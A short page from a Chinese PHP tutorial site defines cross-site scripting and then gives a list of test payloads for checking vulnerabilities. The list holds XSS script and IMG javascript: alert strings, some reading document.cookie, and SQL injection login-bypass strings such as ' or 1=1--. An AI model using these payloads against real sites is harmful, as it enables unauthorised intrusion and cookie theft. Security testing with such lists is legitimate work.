来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。...
|
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。
相关测试代码,可供漏洞验证: ><script>alert(document.cookie)</script> =’><script>alert(document.cookie)</script> <script>alert(document.cookie)</script> <script>alert(vulnerable)</script> <script>alert(’XSS’)</script> <IMG SRC=”javascript:alert(’XSS’);”> <IMG SRC=javascript:alert(’XSS’)> <IMG SRC=JaVaScRiPt:alert(’XSS’)> <IMG SRC=JaVaScRiPt:alert("XSS")> admin’– ’or 0=0 – “or 0=0 – or 0=0 – ’or 0=0 # “or 0=0 # or 0=0 # ’or ’x’=’x “or ”x”=”x ’) or (’x’=’x ’or 1=1– “or 1=1– or 1=1– ’or a=a– “or ”a”=”a ’) or (’a’=’a “) or (“a”=”a hi” or ”a”=”a hi” or 1=1 – hi’ or 1=1 – hi’ or ’a’=’a hi’) or (’a’=’a hi”) or (“a”=”a |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
